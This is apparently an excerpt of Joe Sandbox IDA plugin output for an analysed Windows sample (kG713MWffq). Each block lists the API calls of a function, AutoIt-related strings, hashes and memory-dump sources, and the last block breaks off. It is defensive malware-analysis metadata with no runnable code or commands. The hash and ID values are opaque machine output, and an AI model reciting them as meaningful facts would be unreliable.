                                                                                        • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                        • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                        • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                        APIs
                                                                                          • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                        • _wcslen.LIBCMT ref: 004335F2
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                        • GetLastError.KERNEL32 ref: 0043362B
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                        • _wcsrchr.LIBCMT ref: 00433666
                                                                                          • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                        • String ID: \
                                                                                        • API String ID: 321622961-2967466578
                                                                                        • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                        • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                        • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                        • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                        • API String ID: 1038674560-2734436370
                                                                                        • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                        • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                        • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                        • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                                        • LoadStringW.USER32(00000000), ref: 00434060
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                        • LoadStringW.USER32(00000000), ref: 00434078
                                                                                        • _wprintf.LIBCMT ref: 004340A1
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                        Strings
                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                        • API String ID: 3648134473-3128320259
                                                                                        • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                        • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                        • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                        • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                        • __lock.LIBCMT ref: 00417981
                                                                                          • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                          • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                          • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                        • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                        • __lock.LIBCMT ref: 004179A2
                                                                                        • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                        • String ID: KERNEL32.DLL$pI
                                                                                        • API String ID: 637971194-197072765
                                                                                        • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                        • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                        • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                        • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$_malloc
                                                                                        • String ID:
                                                                                        • API String ID: 1938898002-0
                                                                                        • Opcode ID: c9a42082bca8330c56f828d9adfbb0377cc92045948a33791cb660041a32ecb3
                                                                                        • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                        • Opcode Fuzzy Hash: c9a42082bca8330c56f828d9adfbb0377cc92045948a33791cb660041a32ecb3
                                                                                        • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                        APIs
                                                                                          • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                        • SendMessageW.USER32(76C223D0,00001001,00000000,?), ref: 00448E16
                                                                                        • SendMessageW.USER32(76C223D0,00001026,00000000,?), ref: 00448E25
                                                                                          • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                        • String ID:
                                                                                        • API String ID: 3771399671-0
                                                                                        • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                                        • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                                                        • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                                        • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                        • _memmove.LIBCMT ref: 0044B555
                                                                                        • _memmove.LIBCMT ref: 0044B578
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                        • String ID:
                                                                                        • API String ID: 2737351978-0
                                                                                        • Opcode ID: fcc1d6224d2d35c5b37cfd826e3d94515231d3e7ed15f75706f3704b0972b142
                                                                                        • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                        • Opcode Fuzzy Hash: fcc1d6224d2d35c5b37cfd826e3d94515231d3e7ed15f75706f3704b0972b142
                                                                                        • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                        APIs
                                                                                        • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                        • __calloc_crt.LIBCMT ref: 00415246
                                                                                        • __getptd.LIBCMT ref: 00415253
                                                                                        • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                        • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                        • _free.LIBCMT ref: 0041529E
                                                                                        • __dosmaperr.LIBCMT ref: 004152A9
                                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                        • String ID:
                                                                                        • API String ID: 3638380555-0
                                                                                        • Opcode ID: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                                                        • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                        • Opcode Fuzzy Hash: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                                                        • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$Copy$ClearErrorInitLast
                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                        • API String ID: 3207048006-625585964
                                                                                        • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                        • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                        • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                        • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                        APIs
                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                        • inet_addr.WSOCK32(?), ref: 0046559B
                                                                                        • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                        • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                        • _memmove.LIBCMT ref: 004656CA
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                        • WSACleanup.WSOCK32 ref: 00465762
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                        • String ID:
                                                                                        • API String ID: 2945290962-0
                                                                                        • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                        • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                        • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                        • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                        APIs
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                        • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                        • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                        • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                        • String ID:
                                                                                        • API String ID: 1457242333-0
                                                                                        • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                        • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                        • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                        • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                        APIs
                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConnectRegistry_memmove_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 15295421-0
                                                                                        • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                        • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                        • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                        • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                        APIs
                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                        • _wcstok.LIBCMT ref: 004675B2
                                                                                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                        • _wcscpy.LIBCMT ref: 00467641
                                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                        • _wcslen.LIBCMT ref: 00467793
                                                                                        • _wcslen.LIBCMT ref: 004677BD
                                                                                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                        • String ID: X
                                                                                        • API String ID: 780548581-3081909835
                                                                                        • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                        • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                        • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
